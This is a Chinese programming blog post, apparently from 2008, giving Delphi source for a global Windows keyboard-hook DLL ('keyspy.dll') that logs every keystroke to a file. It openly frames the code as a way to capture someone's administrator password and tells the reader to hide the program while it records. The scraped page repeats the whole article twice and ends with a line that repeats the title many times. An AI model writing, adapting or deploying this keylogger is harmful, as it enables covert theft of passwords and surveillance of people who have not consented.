Chinaunix首页 | 论坛 | 博客
  • 博客访问: 14490450
  • 博文数量: 5645
  • 博客积分: 9880
  • 博客等级: 中将
  • 技术积分: 68081
  • 用 户 组: 普通用户
  • 注册时间: 2008-04-28 13:35
文章分类

全部博文(5645)

文章存档

2008年(5645)

我的朋友

分类:

2008-04-28 20:50:02

下载本文示例代码
  每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作,还可以触发消息,触发的消息分为三种,一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获一些系统消息,但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。  下面就来举个例子(使用Delphi7.0调试通过):  如果你需要访问某个人的机器,那在运行\\SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操作呢?  首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你程序不激活的状态捕获其他信息的,(当然你可以用Windows消息,这个问题不在这里讨论)。  写个DLL定义一下函数 function setkeyhook:bool;export;function endkeyhook:bool;export;procedure keyhookexit;far;procedure SetMainHandle(Handle: HWND); export;forward;function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;procedure EntryPointProc(Reason: Integer); const  hMapObject: THandle = 0; begin  case reason of   DLL_PROCESS_ATTACH:  begin   hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);   rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);  end;  DLL_PROCESS_DETACH: begin try  UnMapViewOfFile(rHookRec);  CloseHandle(hMapObject);  except end;end;end;end;procedure keyhookexit;far;beginif hNexthookproc<>0 then endkeyhook; exitproc:=procsaveexit;end;function endkeyhook:bool;export;beginif hNexthookproc<>0 thenbegin unhookwindowshookex(hNexthookproc); hNexthookproc:=0; messagebeep(0);end;result:=hNexthookproc=0;MainHandle:=0;end;function Setkeyhook:bool;export;begin hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0); result:=hNexthookproc<>0;end;function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;var s:Tstringlist;begin if icode<0 then begin  result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);  exit; end; if lparam<0 then begin  exit; end; s:=TStringlist.Create; if FileExists(afilename) then  s.LoadFromFile(afilename);  //将敲打的键盘字符保存到文件中   s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) char(wParam) );  s.SaveToFile(afilename);  s.Free;  result:=0; end;  Dll的Project文件中定义如下 exportssetkeyhook index 1,endkeyhook index 2,SetMainHandle index 3;begin hNexthookproc:=0;procsaveexit:=exitproc;DllProc := @EntryPointProc;EntryPointProc(DLL_PROCESS_ATTACH);end.   这样DLL就定义好了,接下来就是画个界面: function setkeyhook:bool;external ’keyspy.dll’;function endkeyhook:bool;external ’keyspy.dll’;procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;//开始捕获键盘SetMainHandle(handle);setkeyhook//中止捕获键盘endkeyhook   然后吧你程序隐蔽起来,启动捕获键盘,在中止捕获之前,所有键盘操作都会被记录到你所定义的filename这个文件名中去,注:这些代码是临时写的,仅是为了说明如何写个hook程序。  另外Hook的功能不仅仅是简单使用,这就需要靠大家灵活运用了,可以跟很多windows API来配合,通过很多技巧作出让人意想不到的效果。 阅读关于 Delphi 的全部文章   每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作,还可以触发消息,触发的消息分为三种,一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获一些系统消息,但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。  下面就来举个例子(使用Delphi7.0调试通过):  如果你需要访问某个人的机器,那在运行\\SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操作呢?  首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你程序不激活的状态捕获其他信息的,(当然你可以用Windows消息,这个问题不在这里讨论)。  写个DLL定义一下函数 function setkeyhook:bool;export;function endkeyhook:bool;export;procedure keyhookexit;far;procedure SetMainHandle(Handle: HWND); export;forward;function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;procedure EntryPointProc(Reason: Integer); const  hMapObject: THandle = 0; begin  case reason of   DLL_PROCESS_ATTACH:  begin   hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);   rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);  end;  DLL_PROCESS_DETACH: begin try  UnMapViewOfFile(rHookRec);  CloseHandle(hMapObject);  except end;end;end;end;procedure keyhookexit;far;beginif hNexthookproc<>0 then endkeyhook; exitproc:=procsaveexit;end;function endkeyhook:bool;export;beginif hNexthookproc<>0 thenbegin unhookwindowshookex(hNexthookproc); hNexthookproc:=0; messagebeep(0);end;result:=hNexthookproc=0;MainHandle:=0;end;function Setkeyhook:bool;export;begin hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0); result:=hNexthookproc<>0;end;function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;var s:Tstringlist;begin if icode<0 then begin  result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);  exit; end; if lparam<0 then begin  exit; end; s:=TStringlist.Create; if FileExists(afilename) then  s.LoadFromFile(afilename);  //将敲打的键盘字符保存到文件中   s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) char(wParam) );  s.SaveToFile(afilename);  s.Free;  result:=0; end;  Dll的Project文件中定义如下 exportssetkeyhook index 1,endkeyhook index 2,SetMainHandle index 3;begin hNexthookproc:=0;procsaveexit:=exitproc;DllProc := @EntryPointProc;EntryPointProc(DLL_PROCESS_ATTACH);end.   这样DLL就定义好了,接下来就是画个界面: function setkeyhook:bool;external ’keyspy.dll’;function endkeyhook:bool;external ’keyspy.dll’;procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;//开始捕获键盘SetMainHandle(handle);setkeyhook//中止捕获键盘endkeyhook   然后吧你程序隐蔽起来,启动捕获键盘,在中止捕获之前,所有键盘操作都会被记录到你所定义的filename这个文件名中去,注:这些代码是临时写的,仅是为了说明如何写个hook程序。  另外Hook的功能不仅仅是简单使用,这就需要靠大家灵活运用了,可以跟很多windows API来配合,通过很多技巧作出让人意想不到的效果。 阅读关于 Delphi 的全部文章 下载本文示例代码


Delphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视WindowsDelphi编程使用HOOK监视Windows
阅读(190) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~